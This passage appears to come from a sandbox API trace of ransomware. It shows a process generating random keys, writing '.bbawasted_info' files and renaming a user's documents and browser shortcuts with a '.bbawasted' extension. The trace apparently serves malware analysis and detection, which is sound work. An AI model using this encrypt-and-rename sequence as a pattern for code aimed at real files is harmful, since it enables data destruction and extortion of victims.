lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0072.337] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0072.338] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0072.338] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.338] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zuWVOSguQ3dK.pps") returned 60 [0072.338] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x282) returned 0x5abe80 [0072.338] lstrcpyW (in: lpString1=0x5abef8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.338] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0072.338] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0072.339] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0072.339] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zuWVOSguQ3dK.pps.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zuwvosguq3dk.pps.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.408] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0072.409] SetEndOfFile (hFile=0x110) returned 1 [0072.409] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.409] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.410] lstrcpyW (in: lpString1=0x5abef8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zuWVOSguQ3dK.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zuwvosguq3dk.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zuWVOSguQ3dK.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zuwvosguq3dk.pps.bbawasted")) returned 1 [0072.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zuWVOSguQ3dK.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zuwvosguq3dk.pps.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.410] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.411] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0072.412] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.412] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.412] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0072.413] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.413] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.421] SetEndOfFile (hFile=0x110) returned 1 [0072.423] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.423] CloseHandle (hObject=0x110) returned 1 [0072.424] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0072.425] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0072.425] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0072.425] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0072.425] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x294) returned 0x5c77b0 [0072.425] lstrcpyW (in: lpString1=0x5c783a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.426] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca680 [0072.426] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0072.426] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca680 | out: pbBuffer=0x5ca680) returned 1 [0072.426] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.496] WriteFile (in: hFile=0xfc, lpBuffer=0x5ca680*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5ca680*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0072.760] SetEndOfFile (hFile=0xfc) returned 1 [0072.761] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.761] lstrcpyW (in: lpString1=0x5c783a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.bbawasted")) returned 1 [0072.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.818] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.818] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0072.819] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.819] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.819] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0072.820] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.820] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.828] SetEndOfFile (hFile=0xfc) returned 1 [0072.830] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.830] CloseHandle (hObject=0xfc) returned 1 [0072.833] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0072.834] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0072.834] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0072.834] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0072.834] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5be700 [0072.835] lstrcpyW (in: lpString1=0x5be78c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0072.835] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0072.835] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0072.835] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.837] WriteFile (in: hFile=0xfc, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0072.838] SetEndOfFile (hFile=0xfc) returned 1 [0072.838] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.838] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0072.838] lstrcpyW (in: lpString1=0x5be78c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bbawasted")) returned 1 [0072.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.950] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.951] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5c04a0) returned 1 [0072.952] CryptGenRandom (in: hProv=0x5c04a0, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.952] CryptReleaseContext (hProv=0x5c04a0, dwFlags=0x0) returned 1 [0072.952] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5c04a0) returned 1 [0072.953] CryptGenRandom (in: hProv=0x5c04a0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.953] CryptReleaseContext (hProv=0x5c04a0, dwFlags=0x0) returned 1 [0072.961] SetEndOfFile (hFile=0xfc) returned 1 [0072.988] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0072.988] CloseHandle (hObject=0xfc) returned 1 [0073.012] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be700 | out: hHeap=0x580000) returned 1 [0073.012] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0073.013] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0073.013] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0073.013] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5be700 [0073.013] lstrcpyW (in: lpString1=0x5be7a2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.013] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.013] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0073.014] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.014] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.015] WriteFile (in: hFile=0xfc, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0073.016] SetEndOfFile (hFile=0xfc) returned 1 [0073.016] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.016] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.016] lstrcpyW (in: lpString1=0x5be7a2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.bbawasted")) returned 1 [0073.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.020] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.021] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0073.021] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.021] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.022] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0073.022] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0073.022] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.031] SetEndOfFile (hFile=0xfc) returned 1 [0073.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.033] CloseHandle (hObject=0xfc) returned 1 [0073.034] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be700 | out: hHeap=0x580000) returned 1 [0073.034] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0073.035] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0073.035] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0073.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5be700 [0073.035] lstrcpyW (in: lpString1=0x5be79c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.035] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0073.036] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.036] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.037] WriteFile (in: hFile=0xfc, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0073.038] SetEndOfFile (hFile=0xfc) returned 1 [0073.038] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.038] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.038] lstrcpyW (in: lpString1=0x5be79c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.bbawasted")) returned 1 [0073.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.039] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.039] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0073.040] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.040] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.040] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0073.041] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0073.041] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.049] SetEndOfFile (hFile=0xfc) returned 1 [0073.051] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.051] CloseHandle (hObject=0xfc) returned 1 [0073.053] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be700 | out: hHeap=0x580000) returned 1 [0073.053] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0073.053] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0073.053] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0073.053] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5be700 [0073.053] lstrcpyW (in: lpString1=0x5be7a0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.053] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.054] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0073.054] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.054] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.055] WriteFile (in: hFile=0xfc, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0073.056] SetEndOfFile (hFile=0xfc) returned 1 [0073.056] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.056] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.056] lstrcpyW (in: lpString1=0x5be7a0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.bbawasted")) returned 1 [0073.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0073.157] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0073.157] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0073.158] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.158] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.158] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, 